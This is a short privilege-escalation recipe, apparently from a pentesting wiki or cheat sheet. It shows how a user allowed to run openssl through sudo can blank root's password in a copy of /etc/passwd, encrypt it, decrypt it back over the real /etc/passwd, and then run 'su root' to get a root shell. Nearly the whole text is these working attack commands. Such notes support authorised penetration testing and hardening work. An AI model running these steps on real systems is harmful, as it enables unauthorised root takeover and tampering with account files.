sudo -l
If openssl is allowed to run as sudo
cp /etc/passwd ~/passwd.bak
Edit the file to remove root:X: from root line
root:X:
sudo openssl enc -aes-256-cbc -e -in ~/passwd.bak -out /tmp/passwd.enc
~/passwd.bak
/tmp/passwd.enc
sudo openssl enc -aes-256-cbc -d -in /tmp/passwd.enc -out /etc/passwd
/etc/passwd
su root
Last updated 1 day ago